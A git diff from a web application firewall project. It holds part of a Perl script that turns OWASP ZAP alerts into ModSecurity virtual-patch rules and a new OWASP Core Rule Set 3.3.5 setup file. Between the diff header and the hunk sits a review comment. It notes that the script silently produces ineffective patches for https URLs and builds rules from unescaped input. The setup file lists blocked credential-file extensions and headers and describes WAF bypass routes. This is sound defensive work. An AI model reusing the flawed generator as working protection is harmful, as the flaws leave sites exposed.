+ # see why the URL failed validation.
+ if($test_mode){
+ wait_for_keypress();
+ }
+ return;
+ }
+
+ $current_uricontent = get_uricontent($current_vuln_url);
+
+
+ # Only need param if XSS attack,SQLINJ,XPATH
+ # and maybe for HTTPRS, DT.
+ # NOT for PRL and DI
+
+ if(($vuln_str ne $VULN_CLASS_PRL) && ($vuln_str ne $VULN_CLASS_DI)){
+ @current_params = $param[$vuln_count];
+
+ }
+ if(($vuln_str ne $VULN_CLASS_PRL) && ($vuln_str ne $VULN_CLASS_DI)){
+ print "Current vulnerable Param(s): @current_params\n";
+ }
+
+ generate_patch($vuln_str,$current_uricontent,@current_params);
+
+
+}
+
+
+sub generate_patch
+{
+ my($type,$uricontent,@params,$current_vuln_xml) = @_;
+ my $rule = "";
+ $id = "1".$vuln_count;
+
+ switch($type)
+ {
+ case ($VULN_CLASS_XSS)
+ {
+ if($uricontent ne "" && @params){
+ foreach(@params){
+ if($_ ne ""){
+ # Check to see if each vulnerable parameter is valid
+ # then generate a rule using both uricontent and the
+ # parameter
+ $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/XSS.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\"";
+
+ print $MODSEC_RULES "#\n# OWASP ZAP Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n";
+ print "$VULN_CLASS_XSS (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n";
+ $num_rules_generated++;
+ }
+ }
+ }
+ }
+
+ case ($VULN_CLASS_SQLI)
+ {
+
+ if($uricontent ne "" && @params){
+ foreach(@params){
+ if($_ ne ""){
+ $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/SQL_INJECTION.*ARGS:$_\/\' \"\@gt 0\" 
\"setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\"";
+
+ print $MODSEC_RULES "#\n# OWASP ZAP Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n";
+ print "$VULN_CLASS_SQLI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n";
+ $num_rules_generated++;
+
+
+ }
+ }
+ }
+ }
+
+ case ($VULN_CLASS_BLIND_SQLI)
+ {
+
+ if($uricontent ne "" && @params){
+ foreach(@params){
+ if($_ ne ""){
+ $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/SQL_INJECTION.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\"";
+
+ print $MODSEC_RULES "#\n# OWASP ZAP Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n";
+ print "$VULN_CLASS_SQLI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n";
+ $num_rules_generated++;
+
+
+ }
+ }
+ }
+ }
+
+ case ($VULN_CLASS_LFI)
+ {
+ if($uricontent ne "" && @params){
+ foreach(@params){
+ if($_ ne ""){
+ $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/LFI',tag:'WASCTC/WASC-33',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/LFI.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\"";
+
+ print $MODSEC_RULES "#\n# OWASP ZAP Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n";
+ print "$VULN_CLASS_LFI (uricontent and param) rule successfully 
generated and saved in $modsec_rules_file.\n";
+ $num_rules_generated++;
+
+
+ }
+ }
+ }
+ }
+
+ case ($VULN_CLASS_RFI)
+ {
+ if($uricontent ne "" && @params){
+ foreach(@params){
+ if($_ ne ""){
+ $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/RFI',tag:'WASCTC/WASC-05',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/RFI.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\"";
+
+ print $MODSEC_RULES "#\n# OWASP ZAP Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n";
+ print "$VULN_CLASS_LFI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n";
+ $num_rules_generated++;
+
+
+ }
+ }
+ }
+ }
+
+ case ($VULN_CLASS_HTTPRS)
+ {
+ if($uricontent ne "" && @params){
+ foreach(@params){
+ if($_ ne ""){
+ $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/RESPONSE_SPLITTING',tag:'WASCTC/WASC-25',logdata:'%{MATCHED_VAR_NAME}',severity:'2'\"\n\tSecRule \&TX:\'\/RESPONSE_SPLITTING.*ARGS:$_\/\' \"\@gt 0\" \"setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\"";
+
+ print $MODSEC_RULES "#\n# OWASP ZAP Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n";
+ print "$VULN_CLASS_RFI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n";
+ $num_rules_generated++;
+
+
+ }
+ }
+ }
+ }
+
+ }
+}
+
+sub get_uricontent
+{
+ my($url) = @_;
+ my $regex = "http:\/\/+[a-zA-Z0-9.:-]*\/";
+
+ # First, trim the first part out of the URL:
+ # http://.../
+ $url =~ /$regex/;
+ substr($url,index($url,$&),length($&)) = "";
+
+ # If the URL contains a php or cgi query with
+ # one or more params and values, trim those out.
+ # Trim from the question mark to the end.
+ if($url =~ /\?/){
+ substr($url,index($url,"?")) = "";
+ }
+ return $url;
+
+}
diff --git a/src/common/core/modsecurity/files/coreruleset/plugins/README.md b/src/common/core/modsecurity/files/coreruleset/plugins/README.md
deleted file mode 100644
index 4c2cc9d4f..000000000
--- a/src/common/core/modsecurity/files/coreruleset/plugins/README.md
+++ /dev/null
@@ -1,7 +0,0 @@
-This is the folder where you install CRS plugins.
-
-See https://github.com/coreruleset/plugin-registry
-for a list of registered official and 3rd party plugins.
-
-Plugins are documented in the CRS INSTALL file and
-in also with said plugin registry.
diff --git a/src/common/core/modsecurity/files/coreruleset/plugins/empty-before.conf b/src/common/core/modsecurity/files/coreruleset/plugins/empty-before.conf
deleted file mode 100644
index e69de29bb..000000000
diff --git a/src/common/core/modsecurity/files/coreruleset/plugins/empty-config.conf b/src/common/core/modsecurity/files/coreruleset/plugins/empty-config.conf
deleted file mode 100644
index e69de29bb..000000000
diff --git a/src/common/core/modsecurity/files/crs-setup-v3.conf b/src/common/core/modsecurity/files/crs-setup-v3.conf
new file mode 100644
index 000000000..e0b1d9cde
--- /dev/null
+++ b/src/common/core/modsecurity/files/crs-setup-v3.conf
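Review bot: In `get_uricontent` of zap2modsec.pl the prefix pattern only accepts `http://` and the result of `$url =~ /$regex/` is never checked, so for an `https://` alert URI nothing is trimmed (and `$&` may still hold an earlier match). The `SecRule REQUEST_FILENAME` written by `generate_patch` would then carry the full URL and presumably never match a request path, so the virtual patch is silently ineffective. I would accept both schemes and stop on a failed match: `my $regex = "https?:\/\/+[a-zA-Z0-9.:-]*\/";` and `return "" unless $url =~ /$regex/;` (`generate_patch` already skips an empty `$uricontent`). Separately, `$uricontent` and the parameter name `$_` are interpolated into the rule text unescaped, so regex metacharacters or quotes coming from the scanner report change what the generated rule matches; passing both through `quotemeta` before building `$rule` would contain that. `$VULN_CLASS_SQLI_FINGERPRINT` is listed in `@supported_vulns` but no `case` arm handles it, so those alerts are counted as supported while no rule is written.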
@@ -0,0 +1,869 @@
+# ------------------------------------------------------------------------
+# OWASP ModSecurity Core Rule Set ver.3.3.5
+# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
+# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
+#
+# The OWASP ModSecurity Core Rule Set is distributed under
+# Apache Software License (ASL) version 2
+# Please see the enclosed LICENSE file for full details.
+# ------------------------------------------------------------------------
+
+
+#
+# -- [[ Introduction ]] --------------------------------------------------------
+#
+# The OWASP ModSecurity Core Rule Set (CRS) is a set of generic attack
+# detection rules that provide a base level of protection for any web
+# application. They are written for the open source, cross-platform
+# ModSecurity Web Application Firewall.
+#
+# See also:
+# https://coreruleset.org/
+# https://github.com/SpiderLabs/owasp-modsecurity-crs
+# https://www.owasp.org/index.php/Category:OWASP_ModSecurity_Core_Rule_Set_Project
+#
+
+
+#
+# -- [[ System Requirements ]] -------------------------------------------------
+#
+# CRS requires ModSecurity version 2.8.0 or above.
+# We recommend to always use the newest ModSecurity version.
+#
+# The configuration directives/settings in this file are used to control
+# the OWASP ModSecurity CRS. These settings do **NOT** configure the main
+# ModSecurity settings (modsecurity.conf) such as SecRuleEngine,
+# SecRequestBodyAccess, SecAuditEngine, SecDebugLog, and XML processing.
+#
+# The CRS assumes that modsecurity.conf has been loaded. It is bundled with
+# ModSecurity. If you don't have it, you can get it from:
+# 2.x: https://raw.githubusercontent.com/SpiderLabs/ModSecurity/v2/master/modsecurity.conf-recommended
+# 3.x: https://raw.githubusercontent.com/SpiderLabs/ModSecurity/v3/master/modsecurity.conf-recommended
+#
+# The order of file inclusion in your webserver configuration should always be:
+# 1. 
modsecurity.conf
+# 2. crs-setup.conf (this file)
+# 3. rules/*.conf (the CRS rule files)
+#
+# Please refer to the INSTALL file for detailed installation instructions.
+#
+
+
+#
+# -- [[ Mode of Operation: Anomaly Scoring vs. Self-Contained ]] ---------------
+#
+# The CRS can run in two modes:
+#
+# -- [[ Anomaly Scoring Mode (default) ]] --
+# In CRS3, anomaly mode is the default and recommended mode, since it gives the
+# most accurate log information and offers the most flexibility in setting your
+# blocking policies. It is also called "collaborative detection mode".
+# In this mode, each matching rule increases an 'anomaly score'.
+# At the conclusion of the inbound rules, and again at the conclusion of the
+# outbound rules, the anomaly score is checked, and the blocking evaluation
+# rules apply a disruptive action, by default returning an error 403.
+#
+# -- [[ Self-Contained Mode ]] --
+# In this mode, rules apply an action instantly. This was the CRS2 default.
+# It can lower resource usage, at the cost of less flexibility in blocking policy
+# and less informative audit logs (only the first detected threat is logged).
+# Rules inherit the disruptive action that you specify (i.e. deny, drop, etc).
+# The first rule that matches will execute this action. In most cases this will
+# cause evaluation to stop after the first rule has matched, similar to how many
+# IDSs function.
+#
+# -- [[ Alert Logging Control ]] --
+# In the mode configuration, you must also adjust the desired logging options.
+# There are three common options for dealing with logging. By default CRS enables
+# logging to the webserver error log (or Event viewer) plus detailed logging to
+# the ModSecurity audit log (configured under SecAuditLog in modsecurity.conf).
+#
+# - To log to both error log and ModSecurity audit log file, use: "log,auditlog"
+# - To log *only* to the ModSecurity audit log file, use: "nolog,auditlog"
+# - To log *only* to the error log file, use: "log,noauditlog"
+#
+# Examples for the various modes follow.
+# You must leave one of the following options enabled.
+# Note that you must specify the same line for phase:1 and phase:2.
+#
+
+# Default: Anomaly Scoring mode, log to error log, log to ModSecurity audit log
+# - By default, offending requests are blocked with an error 403 response.
+# - To change the disruptive action, see RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example
+# and review section 'Changing the Disruptive Action for Anomaly Mode'.
+# - In Apache, you can use ErrorDocument to show a friendly error page or
+# perform a redirect: https://httpd.apache.org/docs/2.4/custom-error.html
+#
+SecDefaultAction "phase:1,log,auditlog,pass"
+SecDefaultAction "phase:2,log,auditlog,pass"
+
+# Example: Anomaly Scoring mode, log only to ModSecurity audit log
+# - By default, offending requests are blocked with an error 403 response.
+# - To change the disruptive action, see RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example
+# and review section 'Changing the Disruptive Action for Anomaly Mode'.
+# - In Apache, you can use ErrorDocument to show a friendly error page or
+# perform a redirect: https://httpd.apache.org/docs/2.4/custom-error.html
+#
+# SecDefaultAction "phase:1,nolog,auditlog,pass"
+# SecDefaultAction "phase:2,nolog,auditlog,pass"
+
+# Example: Self-contained mode, return error 403 on blocking
+# - In this configuration the default disruptive action becomes 'deny'. After a
+# rule triggers, it will stop processing the request and return an error 403.
+# - You can also use a different error status, such as 404, 406, et cetera.
+# - In Apache, you can use ErrorDocument to show a friendly error page or
+# perform a redirect: https://httpd.apache.org/docs/2.4/custom-error.html
+#
+# SecDefaultAction "phase:1,log,auditlog,deny,status:403"
+# SecDefaultAction "phase:2,log,auditlog,deny,status:403"
+
+# Example: Self-contained mode, redirect back to homepage on blocking
+# - In this configuration the 'tag' action includes the Host header data in the
+# log. This helps to identify which virtual host triggered the rule (if any).
+# - Note that this might cause redirect loops in some situations; for example
+# if a Cookie or User-Agent header is blocked, it will also be blocked when
+# the client subsequently tries to access the homepage. You can also redirect
+# to another custom URL.
+# SecDefaultAction "phase:1,log,auditlog,redirect:'http://%{request_headers.host}/',tag:'Host: %{request_headers.host}'"
+# SecDefaultAction "phase:2,log,auditlog,redirect:'http://%{request_headers.host}/',tag:'Host: %{request_headers.host}'"
+
+
+#
+# -- [[ Paranoia Level Initialization ]] ---------------------------------------
+#
+# The Paranoia Level (PL) setting allows you to choose the desired level
+# of rule checks that will add to your anomaly scores.
+#
+# With each paranoia level increase, the CRS enables additional rules
+# giving you a higher level of security. However, higher paranoia levels
+# also increase the possibility of blocking some legitimate traffic due to
+# false alarms (also named false positives or FPs). If you use higher
+# paranoia levels, it is likely that you will need to add some exclusion
+# rules for certain requests and applications receiving complex input.
+#
+# - A paranoia level of 1 is default. In this level, most core rules
+# are enabled. PL1 is advised for beginners, installations
+# covering many different sites and applications, and for setups
+# with standard security requirements.
+# At PL1 you should face FPs rarely. 
If you encounter FPs, please
+# open an issue on the CRS GitHub site and don't forget to attach your
+# complete Audit Log record for the request with the issue.
+# - Paranoia level 2 includes many extra rules, for instance enabling
+# many regexp-based SQL and XSS injection protections, and adding
+# extra keywords checked for code injections. PL2 is advised
+# for moderate to experienced users desiring more complete coverage
+# and for installations with elevated security requirements.
+# PL2 comes with some FPs which you need to handle.
+# - Paranoia level 3 enables more rules and keyword lists, and tweaks
+# limits on special characters used. PL3 is aimed at users experienced
+# at the handling of FPs and at installations with a high security
+# requirement.
+# - Paranoia level 4 further restricts special characters.
+# The highest level is advised for experienced users protecting
+# installations with very high security requirements. Running PL4 will
+# likely produce a very high number of FPs which have to be
+# treated before the site can go productive.
+#
+# All rules will log their PL to the audit log;
+# example: [tag "paranoia-level/2"]. This allows you to deduct from the
+# audit log how the WAF behavior is affected by paranoia level.
+#
+# It is important to also look into the variable
+# tx.enforce_bodyproc_urlencoded (Enforce Body Processor URLENCODED)
+# defined below. Enabling it closes a possible bypass of CRS.
+#
+# Uncomment this rule to change the default:
+#
+#SecAction \
+# "id:900000,\
+# phase:1,\
+# nolog,\
+# pass,\
+# t:none,\
+# setvar:tx.paranoia_level=1"
+
+
+# It is possible to execute rules from a higher paranoia level but not include
+# them in the anomaly scoring. This allows you to take a well-tuned system on
+# paranoia level 1 and add rules from paranoia level 2 without having to fear
+# the new rules would lead to false positives that raise your score above the
+# threshold.
+# This optional feature is enabled by uncommenting the following rule and
+# setting the tx.executing_paranoia_level.
+# Technically, rules up to the level defined in tx.executing_paranoia_level
+# will be executed, but only the rules up to tx.paranoia_level affect the
+# anomaly scores.
+# By default, tx.executing_paranoia_level is set to tx.paranoia_level.
+# tx.executing_paranoia_level must not be lower than tx.paranoia_level.
+#
+# Please notice that setting tx.executing_paranoia_level to a higher paranoia
+# level results in a performance impact that is equally high as setting
+# tx.paranoia_level to said level.
+#
+#SecAction \
+# "id:900001,\
+# phase:1,\
+# nolog,\
+# pass,\
+# t:none,\
+# setvar:tx.executing_paranoia_level=1"
+
+
+#
+# -- [[ Enforce Body Processor URLENCODED ]] -----------------------------------
+#
+# ModSecurity selects the body processor based on the Content-Type request
+# header. But clients are not always setting the Content-Type header for their
+# request body payloads. This will leave ModSecurity with limited vision into
+# the payload. The variable tx.enforce_bodyproc_urlencoded lets you force the
+# URLENCODED body processor in these situations. This is off by default, as it
+# implies a change of the behaviour of ModSecurity beyond CRS (the body
+# processor applies to all rules, not only CRS) and because it may lead to
+# false positives already on paranoia level 1. However, enabling this variable
+# closes a possible bypass of CRS so it should be considered.
+#
+# Uncomment this rule to change the default:
+#
+#SecAction \
+# "id:900010,\
+# phase:1,\
+# nolog,\
+# pass,\
+# t:none,\
+# setvar:tx.enforce_bodyproc_urlencoded=1"
+
+
+#
+# -- [[ Anomaly Mode Severity Levels ]] ----------------------------------------
+#
+# Each rule in the CRS has an associated severity level.
+# These are the default scoring points for each severity level.
+# These settings will be used to increment the anomaly score if a rule matches.
+# You may adjust these points to your liking, but this is usually not needed.
+#
+# - CRITICAL severity: Anomaly Score of 5.
+# Mostly generated by the application attack rules (93x and 94x files).
+# - ERROR severity: Anomaly Score of 4.
+# Generated mostly from outbound leakage rules (95x files).
+# - WARNING severity: Anomaly Score of 3.
+# Generated mostly by malicious client rules (91x files).
+# - NOTICE severity: Anomaly Score of 2.
+# Generated mostly by the protocol rules (92x files).
+#
+# In anomaly mode, these scores are cumulative.
+# So it's possible for a request to hit multiple rules.
+#
+# (Note: In this file, we use 'phase:1' to set CRS configuration variables.
+# In general, 'phase:request' is used. However, we want to make absolutely sure
+# that all configuration variables are set before the CRS rules are processed.)
+#
+#SecAction \
+# "id:900100,\
+# phase:1,\
+# nolog,\
+# pass,\
+# t:none,\
+# setvar:tx.critical_anomaly_score=5,\
+# setvar:tx.error_anomaly_score=4,\
+# setvar:tx.warning_anomaly_score=3,\
+# setvar:tx.notice_anomaly_score=2"
+
+
+#
+# -- [[ Anomaly Mode Blocking Threshold Levels ]] ------------------------------
+#
+# Here, you can specify at which cumulative anomaly score an inbound request,
+# or outbound response, gets blocked.
+#
+# Most detected inbound threats will give a critical score of 5.
+# Smaller violations, like violations of protocol/standards, carry lower scores.
+#
+# [ At default value ]
+# If you keep the blocking thresholds at the defaults, the CRS will work
+# similarly to previous CRS versions: a single critical rule match will cause
+# the request to be blocked and logged.
+#
+# [ Using higher values ]
+# If you want to make the CRS less sensitive, you can increase the blocking
+# thresholds, for instance to 7 (which would require multiple rule matches
+# before blocking) or 10 (which would require at least two critical alerts - or
+# a combination of many lesser alerts), or even higher. 
However, increasing the
+# thresholds might cause some attacks to bypass the CRS rules or your policies.
+#
+# [ New deployment strategy: Starting high and decreasing ]
+# It is a common practice to start a fresh CRS installation with elevated
+# anomaly scoring thresholds (>100) and then lower the limits as your
+# confidence in the setup grows. You may also look into the Sampling
+# Percentage section below for a different strategy to ease into a new
+# CRS installation.
+#
+# [ Anomaly Threshold / Paranoia Level Quadrant ]
+#
+# High Anomaly Limit | High Anomaly Limit
+# Low Paranoia Level | High Paranoia Level
+# -> Fresh Site | -> Experimental Site
+# ------------------------------------------------------
+# Low Anomaly Limit | Low Anomaly Limit
+# Low Paranoia Level | High Paranoia Level
+# -> Standard Site | -> High Security Site
+#
+# Uncomment this rule to change the defaults:
+#
+#SecAction \
+# "id:900110,\
+# phase:1,\
+# nolog,\
+# pass,\
+# t:none,\
+# setvar:tx.inbound_anomaly_score_threshold=5,\
+# setvar:tx.outbound_anomaly_score_threshold=4"
+
+#
+# -- [[ Application Specific Rule Exclusions ]] ----------------------------------------
+#
+# Some well-known applications may undertake actions that appear to be
+# malicious. This includes actions such as allowing HTML or Javascript within
+# parameters. In such cases the CRS aims to prevent false positives by allowing
+# administrators to enable prebuilt, application specific exclusions on an
+# application by application basis.
+# These application specific exclusions are distinct from the rules that would
+# be placed in the REQUEST-900-EXCLUSION-RULES-BEFORE-CRS configuration file as
+# they are prebuilt for specific applications. The 'REQUEST-900' file is
+# designed for users to add their own custom exclusions. Note, using these
+# application specific exclusions may loosen restrictions of the CRS,
+# especially if used with an application they weren't designed for. 
As a result
+# they should be applied with care.
+# To use this functionality you must specify a supported application. To do so
+# uncomment rule 900130. In addition to uncommenting the rule you will need to
+# specify which application(s) you'd like to enable exclusions for. Only a
+# (very) limited set of applications are currently supported, please use the
+# filenames prefixed with 'REQUEST-903' to guide you in your selection.
+# Such filenames use the following convention:
+# REQUEST-903.9XXX-{APPNAME}-EXCLUSIONS-RULES.conf
+#
+# It is recommended if you run multiple web applications on your site to limit
+# the effects of the exclusion to only the path where the excluded webapp
+# resides using a rule similar to the following example:
+# SecRule REQUEST_URI "@beginsWith /wordpress/" setvar:tx.crs_exclusions_wordpress=1
+
+#
+# Modify and uncomment this rule to select which application:
+#
+#SecAction \
+# "id:900130,\
+# phase:1,\
+# nolog,\
+# pass,\
+# t:none,\
+# setvar:tx.crs_exclusions_cpanel=1,\
+# setvar:tx.crs_exclusions_drupal=1,\
+# setvar:tx.crs_exclusions_dokuwiki=1,\
+# setvar:tx.crs_exclusions_nextcloud=1,\
+# setvar:tx.crs_exclusions_wordpress=1,\
+# setvar:tx.crs_exclusions_xenforo=1"
+
+#
+# -- [[ HTTP Policy Settings ]] ------------------------------------------------
+#
+# This section defines your policies for the HTTP protocol, such as:
+# - allowed HTTP versions, HTTP methods, allowed request Content-Types
+# - forbidden file extensions (e.g. .bak, .sql) and request headers (e.g. Proxy)
+#
+# These variables are used in the following rule files:
+# - REQUEST-911-METHOD-ENFORCEMENT.conf
+# - REQUEST-912-DOS-PROTECTION.conf
+# - REQUEST-920-PROTOCOL-ENFORCEMENT.conf
+
+# HTTP methods that a client is allowed to use.
+# Default: GET HEAD POST OPTIONS
+# Example: for RESTful APIs, add the following methods: PUT PATCH DELETE
+# Example: for WebDAV, add the following methods: CHECKOUT COPY DELETE LOCK
+# MERGE MKACTIVITY MKCOL MOVE PROPFIND PROPPATCH PUT UNLOCK
+# Uncomment this rule to change the default.
+#SecAction \
+# "id:900200,\
+# phase:1,\
+# nolog,\
+# pass,\
+# t:none,\
+# setvar:'tx.allowed_methods=GET HEAD POST OPTIONS'"
+
+# Content-Types that a client is allowed to send in a request.
+# Default: |application/x-www-form-urlencoded| |multipart/form-data| |multipart/related|
+# |text/xml| |application/xml| |application/soap+xml| |application/json|
+# |application/cloudevents+json| |application/cloudevents-batch+json|
+#
+# Please note, that the rule where CRS uses this variable (920420) evaluates it with operator
+# `@within`, which is case sensitive, but uses t:lowercase. You must add your whole custom
+# Content-Type with lowercase.
+#
+# Bypass Warning: some applications may not rely on the content-type request header in order
+# to parse the request body. This could make an attacker able to send malicious URLENCODED/JSON/XML
+# payloads without being detected by the WAF. Allowing request content-type that doesn't activate any
+# body processor (for example: "text/plain", "application/x-amf", "application/octet-stream", etc..)
+# could lead to a WAF bypass. For example, a malicious JSON payload submitted with a "text/plain"
+# content type may still be interpreted as JSON by a backend application but would not trigger the
+# JSON body parser at the WAF, leading to a bypass.
+#
+# To prevent blocking request with not allowed content-type by default, you can create an exclusion
+# rule that removes rule 920420. 
For example:
+# SecRule REQUEST_HEADERS:Content-Type "@rx ^text/plain" \
+# "id:1234,\
+# phase:1,\
+# nolog,\
+# pass,\
+# t:none,\
+# ctl:ruleRemoveById=920420,\
+# chain"
+# SecRule REQUEST_URI "@rx ^/foo/bar" "t:none"
+#
+# Uncomment this rule to change the default.
+#
+#SecAction \
+# "id:900220,\
+# phase:1,\
+# nolog,\
+# pass,\
+# t:none,\
+# setvar:'tx.allowed_request_content_type=|application/x-www-form-urlencoded| |multipart/form-data| |multipart/related| |text/xml| |application/xml| |application/soap+xml| |application/json| |application/cloudevents+json| |application/cloudevents-batch+json|'"
+
+# Allowed HTTP versions.
+# Default: HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0
+# Example for legacy clients: HTTP/0.9 HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0
+# Note that some web server versions use 'HTTP/2', some 'HTTP/2.0', so
+# we include both version strings by default.
+# Uncomment this rule to change the default.
+#SecAction \
+# "id:900230,\
+# phase:1,\
+# nolog,\
+# pass,\
+# t:none,\
+# setvar:'tx.allowed_http_versions=HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0'"
+
+# Forbidden file extensions.
+# Guards against unintended exposure of development/configuration files.
+# Default: .asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/
+# Example: .bak/ .config/ .conf/ .db/ .ini/ .log/ .old/ .pass/ .pdb/ .rdb/ .sql/
+# Uncomment this rule to change the default.
+#SecAction \ +# "id:900240,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:'tx.restricted_extensions=.asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/'" + +# Forbidden request headers. +# Header names should be lowercase, enclosed by /slashes/ as delimiters. +# Default: /accept-charset/ /content-encoding/ /proxy/ /lock-token/ /content-range/ /if/ +# +# Note: Accept-Charset is a deprecated header that should not be used by clients and +# ignored by servers. It can be used for a response WAF bypass, by asking for a charset +# that the WAF cannot decode. +# Reference: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Accept-Charset +# +# Note: Content-Encoding is used to list any encodings that have been applied to the +# original payload. It is only used for compression, which isn't supported by CRS by +# default since it blocks newlines and null bytes inside the request body. Most +# compression algorithms require at least null bytes per RFC. Blocking it shouldn't +# break anything and increases security since ModSecurity is incapable of properly +# scanning compressed request bodies. +# +# Note: Blocking Proxy header prevents 'httpoxy' vulnerability: https://httpoxy.org +# +# Uncomment this rule to change the default. +#SecAction \ +# "id:900250,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:'tx.restricted_headers=/accept-charset/ /content-encoding/ /proxy/ /lock-token/ /content-range/ /if/'" + +# File extensions considered static files. +# Extensions include the dot, lowercase, enclosed by /slashes/ as delimiters. +# Used in DoS protection rule. See section "Anti-Automation / DoS Protection". 
+# Default: /.jpg/ /.jpeg/ /.png/ /.gif/ /.js/ /.css/ /.ico/ /.svg/ /.webp/ +# Uncomment this rule to change the default. +#SecAction \ +# "id:900260,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:'tx.static_extensions=/.jpg/ /.jpeg/ /.png/ /.gif/ /.js/ /.css/ /.ico/ /.svg/ /.webp/'" + +# Content-Types charsets that a client is allowed to send in a request. +# Default: utf-8|iso-8859-1|iso-8859-15|windows-1252 +# Uncomment this rule to change the default. +# Use "|" to separate multiple charsets like in the rule defining +# tx.allowed_request_content_type. +#SecAction \ +# "id:900280,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:'tx.allowed_request_content_type_charset=utf-8|iso-8859-1|iso-8859-15|windows-1252'" + +# +# -- [[ HTTP Argument/Upload Limits ]] ----------------------------------------- +# +# Here you can define optional limits on HTTP get/post parameters and uploads. +# This can help to prevent application specific DoS attacks. +# +# These values are checked in REQUEST-920-PROTOCOL-ENFORCEMENT.conf. +# Beware of blocking legitimate traffic when enabling these limits. +# + +# Block request if number of arguments is too high +# Default: unlimited +# Example: 255 +# Uncomment this rule to set a limit. +#SecAction \ +# "id:900300,\ +# phase:1,\ +# nolog,\ +# pass,\ +# t:none,\ +# setvar:tx.max_num_args=255" + +# Block request if the length of any argument name is too high +# Default: unlimited +# Example: 100 +# Uncomment this rule to set 